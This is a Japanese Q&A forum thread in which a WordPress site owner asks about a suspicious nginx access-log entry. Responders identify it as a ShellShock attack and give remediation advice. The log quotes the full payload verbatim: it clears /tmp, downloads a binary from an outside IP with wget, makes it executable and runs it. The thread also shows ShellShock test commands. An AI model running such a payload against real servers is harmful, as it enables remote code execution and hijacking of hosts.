質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

ただいまの
回答率

90.32%

  • WordPress

    7675questions

    WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

  • nginx

    904questions

    nginixは軽量で高性能なwebサーバーの1つです。BSD-likeライセンスのもとリリースされており、あわせてHTTPサーバ、リバースプロキシ、メールプロキシの機能も備えています。MacOSX、Windows、Linux、上で動作します。

  • Webサーバー

    464questions

    Webサーバーとは、HTTPリクエストに応じて、クライアントに情報を提供するシステムです。

nginxで動作しているWordPressサイトのアクセスログに不審なログがある。

解決済

回答 3

投稿

  • 評価
  • クリップ 0
  • VIEW 1,000

teketeke

score 41

【環境】
=====
AWS EC2
nginx/1.6.2
PHP 5.3.29
WordPress 4.1.1
=====

現在、AWS上にてWordPressのブログサイトを利用しています。

昨日、アクセスログを確認したところ、以下のようなログがありました。
/bin/bashやechoコマンドといったものが書かれていたので、踏み台にされていたりしないか不安になり、質問させていただきました。

以下のログはどういったものになるのでしょうか。
もしお分かりになる方がいましたら、お教えいただけますでしょうか。

もし何かの攻撃だとしたら、どういったことを行おうとしているものなのでしょうか。

【ログ】
117.21.191.209 - - [01/Apr/2015:11:13:47 +0900] "GET / HTTP/1.1" 200 35509 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"


  • 気になる質問をクリップする

    クリップした質問は、後からいつでもマイページで確認できます。

    またクリップした質問に回答があった際、通知やメールを受け取ることができます。

    クリップを取り消します

  • 良い質問の評価を上げる

    以下のような質問は評価を上げましょう

    • 質問内容が明確
    • 自分も答えを知りたい
    • 質問者以外のユーザにも役立つ

    評価が高い質問は、TOPページの「注目」タブのフィードに表示されやすくなります。

    質問の評価を上げたことを取り消します

  • 評価を下げられる数の上限に達しました

    評価を下げることができません

    • 1日5回まで評価を下げられます
    • 1日に1ユーザに対して2回まで評価を下げられます

    質問の評価を下げる

    teratailでは下記のような質問を「具体的に困っていることがない質問」、「サイトポリシーに違反する質問」と定義し、推奨していません。

    • プログラミングに関係のない質問
    • やってほしいことだけを記載した丸投げの質問
    • 問題・課題が含まれていない質問
    • 意図的に内容が抹消された質問
    • 広告と受け取られるような投稿

    評価が下がると、TOPページの「アクティブ」「注目」タブのフィードに表示されにくくなります。

    質問の評価を下げたことを取り消します

    この機能は開放されていません

    評価を下げる条件を満たしてません

    評価を下げる理由を選択してください

    詳細な説明はこちら

    上記に当てはまらず、質問内容が明確になっていない質問には「情報の追加・修正依頼」機能からコメントをしてください。

    質問の評価を下げる機能の利用条件

    この機能を利用するためには、以下の事項を行う必要があります。

回答 3

checkベストアンサー

+2

はじめまして。
ザックリまとめると

117.21.191.209:9645から不正なプログラムをダウンロードする命令をRun.shに書き込む
それらを実行する命令をRun.shに書き込む
最後にRun.shも削除する様にRun.shに書き込む
Run.shの権限を777にする
Run.shを実行する

といった流れかと思います。
念のため/tmp/China.Z-jztp8が無いか/tmp/Run.shが無いか確認しておくとよいかと思います。

※一部修正しました

投稿

編集

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2015/04/03 17:37

    確認したところ、/tmp/China.Z-jztp8と/tmp/Run.shが無いことを確認しました。

    ちなみに、現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。
    以下確認したことです。
    -----
    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    this is a test
    ※メッセージが表示される
    -----
    $ env var='() {(a)=>\' bash -c "echo date"; cat echo
    date
    cat: echo: No such file or directory
    -----
    # bash --version
    GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)
    Copyright (C) 2009 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

    This is free software; you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    -----
    # rpm -qa bash
    bash-4.1.2-15.24.amzn1.x86_64
    -----

    キャンセル

  • 2015/04/03 18:07

    Amazon Linuxの修正版bashはbash-4.1.2-15.21.amzn1だそうなので、そのバージョンであれば対応済みだと思われます。
    ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。
    また今回の件と直接関係ないですが、PHP5.3はサポートが終了しているので出来うる限りサポートされているバージョンに切り替える方ことをおすすめします。

    キャンセル

  • 2015/04/03 20:49

    >ShellShockに対応しているのであればあまり気を張る必要はないかと思いますが、少なくとも攻撃を行ってきたIPからのアクセスは拒否するのがいいかと思います。
    そうですね。アクセス制限は行おうと思います。
    PHPのバージョンについても、早めに切り替えたいと思います。

    キャンセル

+2

いわゆる ShellShock 脆弱性を狙ったものです。リファラーとユーザーエージェントに攻撃用のコードが埋め込まれています。

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

  • 2015/04/03 17:56

    ytgrsua4様の方へコメントさせていただきましたが、改めてコメントを書かせていただきます。
    このサイトの使い方がいまいちわかっていないので、こういったコメントの書き方がまずかったら御指摘頂けると助かります。

    現在の環境のbashはupdateもなかったので、ShellShock対応済みだと思ったのですが、何か対策はあるのでしょうか。
    以下確認したことです。
    -----
    $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    this is a test
    ※メッセージが表示される
    -----
    $ env var='() {(a)=>\' bash -c "echo date"; cat echo
    date
    cat: echo: No such file or directory
    -----
    # bash --version
    GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)
    Copyright (C) 2009 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

    This is free software; you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    -----
    # rpm -qa bash
    bash-4.1.2-15.24.amzn1.x86_64
    -----

    キャンセル

  • 2015/04/03 21:29

    別の回答のコメントにあるように、既に ShellShock の対応をされているのであればそんなに気にする必要はないと思います(どうせいろんなところからその種のアクセスは来るものなので)。

    キャンセル

  • 2015/04/06 21:33

    コメントありがとうございます。

    >どうせいろんなところからその種のアクセスは来るものなので
    確かに中国、韓国とかからへんなアクセスがなくならないんですよね。
    今回のShellShockの件については、あまり気にしないようにいたします。
    ※引き続きアクセス制限は定期的にやっていくつもりです。

    キャンセル

0

まさしく攻撃ですね。外部のサイトから攻撃用スクリプトをダウンロードさせて実行させる。
つまり、あなたのWebサーバが、他のサーバを攻撃するための踏み台になってしまうわけです。
(攻撃が成功したかどうかは、これを見てもわかりませんが。)

投稿

  • 回答の評価を上げる

    以下のような回答は評価を上げましょう

    • 正しい回答
    • わかりやすい回答
    • ためになる回答

    評価が高い回答ほどページの上位に表示されます。

  • 回答の評価を下げる

    下記のような回答は推奨されていません。

    • 間違っている回答
    • 質問の回答になっていない投稿
    • スパムや攻撃的な表現を用いた投稿

    評価を下げる際はその理由を明確に伝え、適切な回答に修正してもらいましょう。

15分調べてもわからないことは、teratailで質問しよう!

  • ただいまの回答率 90.32%
  • 質問をまとめることで、思考を整理して素早く解決
  • テンプレート機能で、簡単に質問をまとめられる

同じタグがついた質問を見る

  • WordPress

    7675questions

    WordPressは、PHPで開発されているオープンソースのブログソフトウェアです。データベース管理システムにはMySQLを用いています。フリーのブログソフトウェアの中では最も人気が高く、PHPとHTMLを使って簡単にテンプレートをカスタマイズすることができます。

  • nginx

    904questions

    nginixは軽量で高性能なwebサーバーの1つです。BSD-likeライセンスのもとリリースされており、あわせてHTTPサーバ、リバースプロキシ、メールプロキシの機能も備えています。MacOSX、Windows、Linux、上で動作します。

  • Webサーバー

    464questions

    Webサーバーとは、HTTPリクエストに応じて、クライアントに情報を提供するシステムです。